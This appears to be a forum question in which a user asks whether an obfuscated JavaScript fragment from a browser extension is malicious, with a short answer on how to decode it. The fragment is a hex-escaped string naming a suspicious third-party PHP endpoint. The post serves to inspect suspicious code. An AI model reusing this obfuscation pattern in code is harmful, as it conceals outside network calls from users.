-3

I found this code in extension. I need to use it but I am unbelievably afraid that this is not what they say. I'm afraid that this is a malicious script?

Here is the code in pastebin :

var _0xfc98=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x66\x62\x2E\x63\x75\x61\x68\x64\x2E\x63\x6F\x6D\x2F\x30\x30\x31\x2E\x70\x68\x70",

the full code is here ---- > http://pastebin.com/YRquAQiU

Please help :)

Abdelhak
  • 35
  • 9

1 Answers1

1

Run this script and see for yourself:

var _0xfc98=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x66\x62\x2E\x63\x75\x61\x68\x64\x2E\x63\x6F\x6D\x2F\x30\x30\x31\x2E\x70\x68\x70"];
console.log(_0xfc98);
Diego ZoracKy
  • 2,227
  • 15
  • 14